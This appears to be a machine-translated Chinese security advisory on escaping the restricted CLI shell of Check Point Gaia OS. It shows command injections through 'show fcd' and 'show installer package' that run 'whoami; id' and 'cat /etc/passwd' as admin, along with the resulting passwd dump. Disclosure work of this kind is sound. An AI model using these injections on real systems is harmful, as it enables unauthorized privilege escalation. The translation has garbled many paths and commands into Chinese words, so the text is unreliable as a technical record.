(R3)检查盖亚系统特权升级

检查站的盖亚OS滴SSH用户限制壳。外壳限制用户专家从执行bash命令访问。然而,随着适当的格式化,低特权用户可以诱骗shell执行任意命令管理用户。

例如,用户监控用户的最低水平。这个账户应该非常有限的访问。然而,攻击者可以通过执行bash命令显示fcd命令和读取输出使用加载配置:

检查点>显示fcd站不住脚;回声\ $ (whoami; id) > / tmp /监控输出;所有检查点>加载配置/ tmp /监控输出CLINFR0329无效的命令:“管理uid = 0(管理)gid = 0(根)。完成了。CLICMD0159误差在1号线。不能成功执行的所有命令。检查点>

更方便的为admin用户向量(uid 0)是使用显示安装程序包因为它不需要第二个命令读取输出:

检查点>显示安装程序包*;猫\ / etc / passwd > / dev / stderr; #管理:x: 0时::/ home / admin: / etc / cli。sh监控:x: 102:100:监控:/ home /监控:/ etc / cli。上海根:x: 0时:根:/根:/ sbin / nologin测试:x: 0:100:测试:/ home /测试:/ etc / cli。sh没人:x: 99:99:没有人:/:/ sbin / nologin后缀:x: 1001:1001:后缀:/ home /后缀:/ sbin / nologin rpm: x: 37:37:: / var / lib / rpm: / sbin / nologin关闭:x: 6:0:关闭:/ sbin / sbin /关闭qauser:: x: 0:100: qauser: / home / qauser: / etc / cli。sh pcap: x: 77:77:: / var / arpwatch: / sbin / nologin停止:x: 7:0:停止:/ sbin / sbin /停止lowpriv2:: x: 0:100: lowpriv2: / home / lowpriv2: / etc / cli。sh lowpriv: x: 1337:100: lowpriv: / home / lowpriv: / etc / cli。sh cp_postgres: x: 1008:0: Postgres: / home / cp_postgres: / bin / sh _nonlocl: x: 96:100:非本地用户:/ home / _nonlocl: / etc / cli。sh vcsa: x: 69:69:虚拟主机内存所有者:/ dev: / sbin / nologin检查点>